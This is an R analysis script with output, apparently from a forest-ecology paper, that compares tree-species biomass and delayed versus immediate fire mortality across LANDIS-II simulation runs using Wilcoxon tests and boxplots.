#LiriTuli_perc<-AllStack$LiriTuli.ageclass.12/Bio_sum
#QuerRubr_perc<-AllStack$QuerRubr.ageclass.12/Bio_sum
#AcerRubr_percOn<-as.data.frame(AcerRubr_perc*FireOn)
#AcerRubr_percOff<-as.data.frame(AcerRubr_perc*FireOff)
#Species<-'AcerRubr'
CalculateFrame<-function(Species,perc,FireOn,FireOff){
#perc<-AcerRubr_perc
One_percOn<-mean((as.vector(perc*FireOn)),na.rm=T)
One_percOff<-mean((as.vector(perc*FireOff)),na.rm=T)
OneSpecies<-data.frame(Species=c(Species,Species),
Fire=c(rep("Fire",length(One_percOn)),
rep("Landscape",length(One_percOff))),
Value=c(One_percOn,One_percOff))
OneSpecies<-na.omit(OneSpecies)
return(OneSpecies)
}
#hist(AcerFrame$Value[AcerFrame$Fire=="Fire"])
#ist(AcerFrame$Value[AcerFrame$Fire=="NoFire"])
# plot(Bio_sum,ylim=c(0,400),xlim=c(0,400))
# plot(AllStack$AcerRubr.ageclass.0/Bio_sum,ylim=c(0,400),xlim=c(0,400))
# plot(AllStack$QuerPrin.ageclass.0/Bio_sum,ylim=c(0,400),xlim=c(0,400))
# plot(AllStack$LiriTuli.ageclass.0/Bio_sum,ylim=c(0,400),xlim=c(0,400))
# plot(AllStack$QuerRubr.ageclass.0/Bio_sum,ylim=c(0,400),xlim=c(0,400))
```
``` r
# AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+1),".img$"))))
# df<-NULL
# for(i in 1:length(names(AllStack))){
#
# print(names(AllStack[[i]]))
# bio<-cellStats(AllStack[[i]],stat='sum')
# print(bio)
# row<-data.frame(name=names(AllStack[[i]]),bio=bio)
# df<-rbind(row,df)
# }
```
``` r
### AllFrame1
Sumstack<-function(Biomass,t,stagger,FireOn,FireOff){
AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+stagger),".img$"))))
AllStack<-AllStack[[which(c(grepl("LiriTuli|AcerRubr|NyssSylv|QuerAlba|PinuTaed|QuerPrin|QuerCocc|PinuVirg|PinuStro|QuerRubr|QuerFalc",names(AllStack))))]]
AllStack<-AllStack[[which(c(grepl("ageclass1",names(AllStack))))]]
Bio_sum<-calc(AllStack,sum)
LiriTuli_perc<-AllStack[[which(c(grepl("LiriTuli", names(AllStack), fixed = TRUE)))]]/Bio_sum
LiriTuliFrame<-CalculateFrame("LiriTuli",LiriTuli_perc,FireOn,FireOff)
AcerRubr_perc<-AllStack[[which(c(grepl("AcerRubr", names(AllStack), fixed = TRUE)))]]/Bio_sum
AcerFrame<-CalculateFrame("AcerRubr",AcerRubr_perc,FireOn,FireOff)
NyssSylv_perc<-AllStack[[which(c(grepl("NyssSylv", names(AllStack), fixed = TRUE)))]]/Bio_sum
NyssSylvFrame<-CalculateFrame("NyssSylv",NyssSylv_perc,FireOn,FireOff)
QuerAlba_perc<-AllStack[[which(c(grepl("QuerAlba", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerAlbaFrame<-CalculateFrame("QuerAlba",QuerAlba_perc,FireOn,FireOff)
PinuTaed_perc<-AllStack[[which(c(grepl("PinuTaed", names(AllStack), fixed = TRUE)))]]/Bio_sum
PinuTaedFrame<-CalculateFrame("PinuTaed",PinuTaed_perc,FireOn,FireOff)
QuerPrin_perc<-AllStack[[which(c(grepl("QuerPrin", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerPrinFrame<-CalculateFrame("QuerPrin",QuerPrin_perc,FireOn,FireOff)
QuerCocc_perc<-AllStack[[which(c(grepl("QuerCocc", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerCoccFrame<-CalculateFrame("QuerCocc",QuerCocc_perc,FireOn,FireOff)
PinuVirg_perc<-AllStack[[which(c(grepl("PinuVirg", names(AllStack), fixed = TRUE)))]]/Bio_sum
PinuVirgFrame<-CalculateFrame("PinuVirg",PinuVirg_perc,FireOn,FireOff)
PinuStro_perc<-AllStack[[which(c(grepl("PinuStro", names(AllStack), fixed = TRUE)))]]/Bio_sum
PinuStroFrame<-CalculateFrame("PinuStro",PinuStro_perc,FireOn,FireOff)
QuerRubr_perc<-AllStack[[which(c(grepl("QuerRubr", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerRubrFrame<-CalculateFrame("QuerRubr",QuerRubr_perc,FireOn,FireOff)
QuerFalc_perc<-AllStack[[which(c(grepl("QuerFalc", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerFalcFrame<-CalculateFrame("QuerFalc",QuerFalc_perc,FireOn,FireOff)
AllFrameThree<-rbind(LiriTuliFrame,AcerFrame,NyssSylvFrame,QuerAlbaFrame,
QuerAlbaFrame,PinuTaedFrame,QuerPrinFrame,QuerCoccFrame,
PinuVirgFrame,PinuStroFrame,QuerRubrFrame,QuerFalcFrame)
AllFrameThree<-cbind(data.frame(Time=t,Stagger=stagger),AllFrameThree)
return(AllFrameThree)}
# ptm <- proc.time()
# dfout<-Sumstack(Biomass,2,1)
# proc.time() - ptm
#
#
# dfout<-Sumstack(Biomass,2,1)
#### Stagger 1
Stagger<-function(LANDIS_Inputs,Biomass,Stagger){
Fire2<-Firemaps(LANDIS_Inputs,2)
FireOn<-Fire2[[1]]
FireOff<-Fire2[[2]]
Year2<-Sumstack(Biomass,2,Stagger,FireOn,FireOff)
Fire3<-Firemaps(LANDIS_Inputs,3)
FireOn<-Fire3[[1]]
FireOff<-Fire3[[2]]
Year3<-Sumstack(Biomass,3,Stagger,FireOn,FireOff)
Fire4<-Firemaps(LANDIS_Inputs,4)
FireOn<-Fire4[[1]]
FireOff<-Fire4[[2]]
Year4<-Sumstack(Biomass,4,Stagger,FireOn,FireOff)
Fire5<-Firemaps(LANDIS_Inputs,5)
FireOn<-Fire5[[1]]
FireOff<-Fire5[[2]]
Year5<-Sumstack(Biomass,5,Stagger,FireOn,FireOff)
Fire6<-Firemaps(LANDIS_Inputs,6)
FireOn<-Fire6[[1]]
FireOff<-Fire6[[2]]
Year6<-Sumstack(Biomass,6,Stagger,FireOn,FireOff)
Fire7<-Firemaps(LANDIS_Inputs,7)
FireOn<-Fire7[[1]]
FireOff<-Fire7[[2]]
Year7<-Sumstack(Biomass,7,Stagger,FireOn,FireOff)
Fire8<-Firemaps(LANDIS_Inputs,8)
FireOn<-Fire8[[1]]
FireOff<-Fire8[[2]]
Year8<-Sumstack(Biomass,8,Stagger,FireOn,FireOff)
Fire9<-Firemaps(LANDIS_Inputs,9)
FireOn<-Fire9[[1]]
FireOff<-Fire9[[2]]
Year9<-Sumstack(Biomass,9,Stagger,FireOn,FireOff)
Fire10<-Firemaps(LANDIS_Inputs,10)
FireOn<-Fire10[[1]]
FireOff<-Fire10[[2]]
Year10<-Sumstack(Biomass,10,Stagger,FireOn,FireOff)
Fire11<-Firemaps(LANDIS_Inputs,11)
FireOn<-Fire11[[1]]
FireOff<-Fire11[[2]]
Year11<-Sumstack(Biomass,11,Stagger,FireOn,FireOff)
Stagger1<-rbind(Year2,Year3,Year4,Year5,Year6,Year7,Year8,
Year9,Year10,Year11)
return(Stagger1)
}
```
``` r
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_D2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_D3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_D4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_D5_R2/"
Stagger1_1<-Stagger(LANDIS_Inputs,Biomass,1)
Stagger1_2<-Stagger(LANDIS_Inputs2,Biomass,1)
Stagger1_3<-Stagger(LANDIS_Inputs3,Biomass,1)
Stagger1_4<-Stagger(LANDIS_Inputs4,Biomass,1)
Stagger1_5<-Stagger(LANDIS_Inputs5,Biomass,1)
Stagger_yr1<-rbind(Stagger1_1,Stagger1_2,Stagger1_3,Stagger1_4,Stagger1_5)
write.csv(Stagger_yr1,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger1_428.csv")
Stagger10_1<-Stagger(LANDIS_Inputs,Biomass,10)
Stagger10_2<-Stagger(LANDIS_Inputs2,Biomass,10)
Stagger10_3<-Stagger(LANDIS_Inputs3,Biomass,10)
Stagger10_4<-Stagger(LANDIS_Inputs4,Biomass,10)
Stagger10_5<-Stagger(LANDIS_Inputs5,Biomass,10)
Stagger_yr10<-rbind(Stagger10_1,Stagger10_2,Stagger10_3,Stagger10_4,Stagger10_5)
write.csv(Stagger_yr10,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger10_428.csv")
###
# Stagger1<-write.csv(Stagger1,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger1.csv")
# Stagger5<-write.csv(Stagger5,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger5.csv")
# Stagger10<-write.csv(Stagger10,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger10.csv")
```
``` r
#head(OneRun)
g_legend<-function(a.gplot){
tmp <- ggplot_gtable(ggplot_build(a.gplot))
leg <- which(sapply(tmp$grobs, function(x) x$name) == "guide-box")
legend <- tmp$grobs[[leg]]
return(legend)}
Stagger1<-read.csv("D:/Sapps_DM_paper/Stagger1_428.csv")
#Stagger5<-read.csv("C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger5.csv")
Stagger10<-read.csv("D:/Sapps_DM_paper/Stagger10_428.csv")
Stagger1$Fire[Stagger1$Fire=="Fire"]<-"Burned Sites (Delayed Mortality)"
Stagger1$Fire[Stagger1$Fire=="Landscape"]<-"Landscape Average"
#Stagger5$Fire[Stagger5$Fire=="Fire"]<-"Burned Sites (Delayed Mortality)"
#Stagger5$Fire[Stagger5$Fire=="NoFire"]<-"Unburned Landscape"
Stagger10$Fire[Stagger10$Fire=="Fire"]<-"Burned Sites (Delayed Mortality)"
Stagger10$Fire[Stagger10$Fire=="NoFire"]<-"Unburned Landscape"
head(Stagger1)
```
## X Time Stagger Species Fire Value
## 1 1 2 1 LiriTuli Burned Sites (Delayed Mortality) 0.1664392
## 2 2 2 1 LiriTuli Landscape Average 0.1674065
## 3 3 2 1 AcerRubr Burned Sites (Delayed Mortality) 0.1107812
## 4 4 2 1 AcerRubr Landscape Average 0.2468617
## 5 5 2 1 NyssSylv Burned Sites (Delayed Mortality) 0.1259665
## 6 6 2 1 NyssSylv Landscape Average 0.2284488
``` r
compare_means(Value ~ Fire, data = Stagger1,
group.by = "Species")
```
## # A tibble: 11 x 9
## Species .y. group1 group2 p p.adj p.format p.signif method
## <chr> <chr> <chr> <chr> <dbl> <dbl> <chr> <chr> <chr>
## 1 LiriTuli Value Burned Sites~ Landscap~ 0.515 1 0.5147 ns Wilco~
## 2 AcerRubr Value Burned Sites~ Landscap~ 0.866 1 0.8659 ns Wilco~
## 3 NyssSylv Value Burned Sites~ Landscap~ 0.114 1 0.1136 ns Wilco~
## 4 QuerAlba Value Burned Sites~ Landscap~ 0.0316 0.32 0.0316 * Wilco~
## 5 PinuTaed Value Burned Sites~ Landscap~ 0.855 1 0.8554 ns Wilco~
## 6 QuerPrin Value Burned Sites~ Landscap~ 0.319 1 0.3192 ns Wilco~
## 7 QuerCocc Value Burned Sites~ Landscap~ 0.560 1 0.5602 ns Wilco~
## 8 PinuVirg Value Burned Sites~ Landscap~ 0.528 1 0.5282 ns Wilco~
## 9 PinuStro Value Burned Sites~ Landscap~ 0.00358 0.039 0.0036 ** Wilco~
## 10 QuerRubr Value Burned Sites~ Landscap~ 0.391 1 0.3907 ns Wilco~
## 11 QuerFalc Value Burned Sites~ Landscap~ 0.839 1 0.8388 ns Wilco~
``` r
# compare_means(Value ~ Fire, data = Stagger5,
# group.by = "Species")
compare_means(Value ~ Fire, data = Stagger10,
group.by = "Species")
```
## # A tibble: 11 x 9
## Species .y. group1 group2 p p.adj p.format p.signif method
## <chr> <chr> <chr> <chr> <dbl> <dbl> <chr> <chr> <chr>
## 1 LiriTuli Value Burned Sites ~ Landsc~ 8.88e-1 1 0.88761 ns Wilco~
## 2 AcerRubr Value Burned Sites ~ Landsc~ 3.72e-1 1 0.37199 ns Wilco~
## 3 NyssSylv Value Burned Sites ~ Landsc~ 6.32e-1 1 0.63185 ns Wilco~
## 4 QuerAlba Value Burned Sites ~ Landsc~ 9.70e-1 1 0.96979 ns Wilco~
## 5 PinuTaed Value Burned Sites ~ Landsc~ 3.85e-4 0.0042 0.00038 *** Wilco~
## 6 QuerPrin Value Burned Sites ~ Landsc~ 1.06e-1 0.95 0.10596 ns Wilco~
## 7 QuerCocc Value Burned Sites ~ Landsc~ 6.37e-1 1 0.63677 ns Wilco~
## 8 PinuVirg Value Burned Sites ~ Landsc~ 8.39e-1 1 0.83885 ns Wilco~
## 9 PinuStro Value Burned Sites ~ Landsc~ 1.90e-3 0.019 0.00190 ** Wilco~
## 10 QuerRubr Value Burned Sites ~ Landsc~ 7.85e-1 1 0.78539 ns Wilco~
## 11 QuerFalc Value Burned Sites ~ Landsc~ 7.91e-1 1 0.79069 ns Wilco~
``` r
#(OneSpecies$Value)
```
``` r
p1 <- ggplot(Stagger1, aes(x=Species, y=Value*100, fill=Fire)) +
ggtitle("Immediately following fire") +
stat_compare_means(method = "wilcox.test",label = "p.format",size =6 )+# fill=name allow to automatically dedicate a color for each group
geom_boxplot(adjust=2, width=.7,outlier.shape = NA)+
theme_classic(base_size = 24)+
theme(legend.position="none")+
xlab("") +
ylab("Percent total biomass")
```
## Warning: Ignoring unknown parameters: adjust
``` r
# p2 <- ggplot(Stagger5, aes(x=Species, y=Value, fill=Fire)) + # fill=name allow to automatically dedicate a color for each group
# ggtitle("Relative biomass 5 Years following fire") +
# stat_compare_means(method = "wilcox.test",label = "p.format",size =6 )+
# # fill=name allow to automatically dedicate a color for each group
# geom_boxplot(adjust=2, width=.7,outlier.shape = NA)+
# theme_classic(base_size = 24)+
# theme(legend.position="none")+
# xlab("") +
# ylab("Portion of total biomass")
p3 <- ggplot(Stagger10, aes(x=Species, y=Value*100, fill=Fire)) + # fill=name allow to automatically dedicate a color for each group
ggtitle("10 Years following fire") +
stat_compare_means(method = "wilcox.test",label = "p.format",size =6 )+# fill=name allow to automatically dedicate a color for each group
geom_boxplot(adjust=2, width=.7,outlier.shape = NA)+
theme_classic(base_size = 24)+
theme(legend.position="none")+
xlab("Species") +
ylab("Percent total biomass")
```
## Warning: Ignoring unknown parameters: adjust
``` r
p4<-g_legend(ggplot(Stagger1, aes(x=Species, y=Value, fill=Fire)) +
ggtitle("Relative biomass immediately following fire") +
stat_compare_means(method = "wilcox.test",label = "p.format",size =6 )+# fill=name allow to automatically dedicate a color for each group
geom_boxplot(adjust=2, width=.7,outlier.shape = NA)+
theme_classic(base_size = 24)+
theme(legend.title = element_blank(),axis.text=element_text(size=18),
axis.title=element_text(size=18,face="bold")))
```
## Warning: Ignoring unknown parameters: adjust
``` r
grid.arrange(p1,p3,p4,nrow =3,top = textGrob("Trees under 20 years old",gp=gpar(fontsize=35,font=1)),heights=c(6,6,1))
```
<!-- -->
``` r
# Folder1<-"E:/DM_Runs_222/"
# Csv<-read.csv(paste0(Folder1,"GA_Model_D1/scrapple-events-log.csv"))
# CohortsK<-Csv$CohortsKilled
# CohortsAv<-Csv$AvailableCohorts
CalculatePerc<-function(Csv){
CohortK_s<-sum(Csv$CohortsKilled)
CohortsAv_s<-sum(Csv$AvailableCohorts)
#colnames(Csv)
Perc<-CohortK_s/CohortsAv_s
return(Perc)
}
Folder1<-"D:/Sapps_DM_paper/DM_runs_4_4/"
Csv<-read.csv(paste0(Folder1,"GA_Model_D2_R2/scrapple-events-log.csv"))
Delayed_1<-CalculatePerc(Csv)
D1_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_D2_R2/scrapple-events-log.csv"))
Delayed_2<-CalculatePerc(Csv)
D2_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_D3_R2/scrapple-events-log.csv"))
Delayed_3<-CalculatePerc(Csv)
D3_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_D4_R2/scrapple-events-log.csv"))
Delayed_4<-CalculatePerc(Csv)
D4_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_D5_R2/scrapple-events-log.csv"))
Delayed_5<-CalculatePerc(Csv)
D5_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND1_R2/scrapple-events-log.csv"))
ND_1<-CalculatePerc(Csv)
ND1_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND2_R2/scrapple-events-log.csv"))
ND_2<-CalculatePerc(Csv)
ND2_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND3_R2/scrapple-events-log.csv"))
ND_3<-CalculatePerc(Csv)
ND3_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND4_R2/scrapple-events-log.csv"))
ND_4<-CalculatePerc(Csv)
ND4_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND5_R2/scrapple-events-log.csv"))
ND_5<-CalculatePerc(Csv)
ND5_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Runs_Bio<-data.frame(Run=c(rep("Delayed Mortality",5),rep("Immediate Mortality",5)),
Value=c(D1_bio,D2_bio,D3_bio,D4_bio,D5_bio,
ND1_bio,ND2_bio,ND3_bio,ND4_bio,ND5_bio))
Runs<-data.frame(Run=c(rep("Delayed Mortality",5),rep("Immediate Mortality",5)),
Value=c(Delayed_1,Delayed_2,Delayed_3,Delayed_4,Delayed_5,
ND_1,ND_2,ND_3,ND_4,ND_5))
#head(data)
min(Runs$Value[Runs$Run=="Delayed Mortality"])
```
## [1] 0.3775767
``` r
median(Runs$Value[Runs$Run=="Delayed Mortality"])
```
## [1] 0.3979959
``` r
max(Runs$Value[Runs$Run=="Delayed Mortality"])
```
## [1] 0.403935
``` r
min(Runs$Value[Runs$Run=="Immediate Mortality"])
```
## [1] 0.2238418
``` r
median(Runs$Value[Runs$Run=="Immediate Mortality"])
```
## [1] 0.2423879
``` r
max(Runs$Value[Runs$Run=="Immediate Mortality"])
```
## [1] 0.2457687
``` r
p1 <- ggplot(Runs_Bio, aes(x=Run, y=Value)) + # fill=name allow to automatically dedicate a color for each group
geom_boxplot()+
xlab("") +
ggtitle("A )") +
ylab("Biomass removed (Mg per year)") +
theme_classic(base_size=16)
quantile(Runs_Bio$Value[Runs_Bio$Run=="Delayed Mortality"],.05)
```
## 5%
## 212199
``` r
median(Runs_Bio$Value[Runs_Bio$Run=="Delayed Mortality"])
```
## [1] 212610.9
``` r
quantile(Runs_Bio$Value[Runs_Bio$Run=="Delayed Mortality"],.95)
```
## 95%
## 263299.5
``` r
quantile(Runs_Bio$Value[Runs_Bio$Run=="Immediate Mortality"],.05)
```
## 5%
## 107067.8
``` r
median(Runs_Bio$Value[Runs_Bio$Run=="Immediate Mortality"])
```
## [1] 132722.2
``` r
quantile(Runs_Bio$Value[Runs_Bio$Run=="Immediate Mortality"],.95)
```
## 95%
## 163196.7
``` r
p2 <- ggplot(Runs, aes(x=Run, y=Value)) + # fill=name allow to automatically dedicate a color for each group
geom_boxplot()+
xlab("") +
ylab("Percent mortality per simulation") +
ggtitle("B )") +
theme_classic(base_size=16)
#min(Runs$Value[Runs$Run=="Delayed"])
quantile(Runs$Value[Runs$Run=="Delayed Mortality"],.05)
```
## 5%
## 0.3816605
``` r
median(Runs$Value[Runs$Run=="Delayed Mortality"])
```
## [1] 0.3979959
``` r
#max(Runs$Value[Runs$Run=="Delayed Mortality"])
quantile(Runs$Value[Runs$Run=="Delayed Mortality"],.95)
```
## 95%
## 0.403034
``` r
#min(Runs$Value[Runs$Run=="Immediate Mortality"])
quantile(Runs$Value[Runs$Run=="Immediate Mortality"],.05)
```
## 5%
## 0.224135
``` r
median(Runs$Value[Runs$Run=="Immediate Mortality"])
```
## [1] 0.2423879
``` r
quantile(Runs$Value[Runs$Run=="Immediate Mortality"],.95)
```
## 95%
## 0.2454835
``` r
grid.arrange(p1,p2,nrow=1)
```
<!-- -->
``` r
g <- arrangeGrob(p1,p2,nrow=1)
ggsave(file="Biomass_ForPub.png",g,height = 7.0, width = 10.0, dpi = 200)
getwd()
```
## [1] "D:/Sapps_DM_paper"
# Standing Biomass
``` r
#### Standing biomass.
Biomass<-"E:/DM_runs_4_4/GA_Model_D1_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
#t<-1
#stragger<-0
#AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+stagger),".img$"))))
Firemaps<-function(LANDIS_Inputs,t){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
FireOn<-Fire1
FireOn[FireOn<=1]<-NA
FireOn[FireOn>1]<-1
plot(FireOn,ylim=c(0,400),xlim=c(0,400))
FireOff<-Fire1
FireOff[FireOff!=1]<-NA
plot(FireOff)
return(list(FireOn,FireOff))
}
Fire2<-Firemaps(LANDIS_Inputs,2)
FireOn<-Fire2[[1]]
FireOff<-Fire2[[2]]
# AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+10),".img$"))))
#Bio_sum<-calc(AllStack,sum)
CalculateFrame<-function(Species,perc,FireOn,FireOff){
#perc<-AcerRubr_perc
One_percOn<-mean((as.vector(perc*FireOn)),na.rm=T)
One_percOff<-mean((as.vector(perc*FireOff)),na.rm=T)
OneSpecies<-data.frame(Species=c(Species,Species),
Fire=c(rep("Fire",length(One_percOn)),
rep("Landscape",length(One_percOff))),
Value=c(One_percOn,One_percOff))
OneSpecies<-na.omit(OneSpecies)
return(OneSpecies)
}
Sumstack2<-function(Biomass,t,stagger,FireOn,FireOff){
AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+stagger),".img$")))[c(FALSE,TRUE)])#
LiriTuli_perc<-AllStack[[which(c(grepl("LiriTuli", names(AllStack), fixed = TRUE)))]]
LiriTuliFrame<-CalculateFrame("LiriTuli",LiriTuli_perc,FireOn,FireOff)
AcerRubr_perc<-AllStack[[which(c(grepl("AcerRubr", names(AllStack), fixed = TRUE)))]]
AcerFrame<-CalculateFrame("AcerRubr",AcerRubr_perc,FireOn,FireOff)
NyssSylv_perc<-AllStack[[which(c(grepl("NyssSylv", names(AllStack), fixed = TRUE)))]]
NyssSylvFrame<-CalculateFrame("NyssSylv",NyssSylv_perc,FireOn,FireOff)
QuerAlba_perc<-AllStack[[which(c(grepl("QuerAlba", names(AllStack), fixed = TRUE)))]]
QuerAlbaFrame<-CalculateFrame("QuerAlba",QuerAlba_perc,FireOn,FireOff)
PinuTaed_perc<-AllStack[[which(c(grepl("PinuTaed", names(AllStack), fixed = TRUE)))]]
PinuTaedFrame<-CalculateFrame("PinuTaed",PinuTaed_perc,FireOn,FireOff)
QuerPrin_perc<-AllStack[[which(c(grepl("QuerPrin", names(AllStack), fixed = TRUE)))]]
QuerPrinFrame<-CalculateFrame("QuerPrin",QuerPrin_perc,FireOn,FireOff)
QuerCocc_perc<-AllStack[[which(c(grepl("QuerCocc", names(AllStack), fixed = TRUE)))]]
QuerCoccFrame<-CalculateFrame("QuerCocc",QuerCocc_perc,FireOn,FireOff)
PinuVirg_perc<-AllStack[[which(c(grepl("PinuVirg", names(AllStack), fixed = TRUE)))]]
PinuVirgFrame<-CalculateFrame("PinuVirg",PinuVirg_perc,FireOn,FireOff)
PinuStro_perc<-AllStack[[which(c(grepl("PinuStro", names(AllStack), fixed = TRUE)))]]
PinuStroFrame<-CalculateFrame("PinuStro",PinuStro_perc,FireOn,FireOff)
QuerRubr_perc<-AllStack[[which(c(grepl("QuerRubr", names(AllStack), fixed = TRUE)))]]
QuerRubrFrame<-CalculateFrame("QuerRubr",QuerRubr_perc,FireOn,FireOff)
QuerFalc_perc<-AllStack[[which(c(grepl("QuerFalc", names(AllStack), fixed = TRUE)))]]
QuerFalcFrame<-CalculateFrame("QuerFalc",QuerFalc_perc,FireOn,FireOff)
AllFrameThree<-rbind(LiriTuliFrame,AcerFrame,NyssSylvFrame,
QuerAlbaFrame,PinuTaedFrame,QuerPrinFrame,QuerCoccFrame,
PinuVirgFrame,PinuStroFrame,QuerRubrFrame,QuerFalcFrame)
AllFrameThree<-cbind(data.frame(Time=t,Stagger=stagger),AllFrameThree)
return(AllFrameThree)}
Stagger<-function(LANDIS_Inputs,Biomass,Stagger){
Fire2<-Firemaps(LANDIS_Inputs,2)
FireOn<-Fire2[[1]]
FireOff<-Fire2[[2]]
Year2<-Sumstack2(Biomass,2,Stagger,FireOn,FireOff)
Fire3<-Firemaps(LANDIS_Inputs,3)
FireOn<-Fire3[[1]]
FireOff<-Fire3[[2]]
Year3<-Sumstack2(Biomass,3,Stagger,FireOn,FireOff)
Fire4<-Firemaps(LANDIS_Inputs,4)
FireOn<-Fire4[[1]]
FireOff<-Fire4[[2]]
Year4<-Sumstack2(Biomass,4,Stagger,FireOn,FireOff)
Fire5<-Firemaps(LANDIS_Inputs,5)
FireOn<-Fire5[[1]]
FireOff<-Fire5[[2]]
Year5<-Sumstack2(Biomass,5,Stagger,FireOn,FireOff)
Fire6<-Firemaps(LANDIS_Inputs,6)
FireOn<-Fire6[[1]]
FireOff<-Fire6[[2]]
Year6<-Sumstack2(Biomass,6,Stagger,FireOn,FireOff)
Fire7<-Firemaps(LANDIS_Inputs,7)
FireOn<-Fire7[[1]]
FireOff<-Fire7[[2]]
Year7<-Sumstack2(Biomass,7,Stagger,FireOn,FireOff)
Fire8<-Firemaps(LANDIS_Inputs,8)
FireOn<-Fire8[[1]]
FireOff<-Fire8[[2]]
Year8<-Sumstack2(Biomass,8,Stagger,FireOn,FireOff)
Fire9<-Firemaps(LANDIS_Inputs,9)
FireOn<-Fire9[[1]]
FireOff<-Fire9[[2]]
Year9<-Sumstack2(Biomass,9,Stagger,FireOn,FireOff)
Fire10<-Firemaps(LANDIS_Inputs,10)
FireOn<-Fire9[[1]]
FireOff<-Fire9[[2]]
Year10<-Sumstack2(Biomass,10,Stagger,FireOn,FireOff)
Fire11<-Firemaps(LANDIS_Inputs,11)
FireOn<-Fire11[[1]]
FireOff<-Fire11[[2]]
Year11<-Sumstack2(Biomass,11,Stagger,FireOn,FireOff)
Stagger0<-rbind(Year2,Year3,Year4,Year5,Year6,Year7,Year8,
Year9,Year10,Year11)
return(Stagger0)
}
```
``` r
###Testings
#
# Fire2<-Firemaps(LANDIS_Inputs,3)
# FireOn<-Fire2[[1]]
# FireOff<-Fire2[[2]]
# Year2a<-Sumstack2(Biomass,3,0,FireOn,FireOff)
# sum(Year2a$Value)
# Year2<-Sumstack2(Biomass,3,-1,FireOn,FireOff)
# sum(Year2$Value)
#### Stagger 0
#### Year_of
Biomass<-"E:/DM_runs_4_4/GA_Model_D1_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
rep1<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,0)
Biomass<-"E:/DM_runs_4_4/GA_Model_D2_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D2_R2/"
rep2<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,0)
Biomass<-"E:/DM_runs_4_4/GA_Model_D3_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D3_R2/"
rep3<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,0)
Biomass<-"E:/DM_runs_4_4/GA_Model_D4_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D4_R2/"
rep4<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,0)
Biomass<-"E:/DM_runs_4_4/GA_Model_D5_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D5_R2/"
rep5<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,0)
StaggerAfter<-rbind(rep1,rep2,rep3,rep4,rep5)
#### Stagger 1
Biomass<-"E:/DM_runs_4_4/GA_Model_D1_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
rep1<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,-1)
Biomass<-"E:/DM_runs_4_4/GA_Model_D2_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D2_R2/"
rep2<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,-1)
Biomass<-"E:/DM_runs_4_4/GA_Model_D3_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D3_R2/"
rep3<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,-1)
Biomass<-"E:/DM_runs_4_4/GA_Model_D4_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D4_R2/"
rep4<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,-1)
Biomass<-"E:/DM_runs_4_4/GA_Model_D5_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D5_R2/"
rep5<-Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,-1)
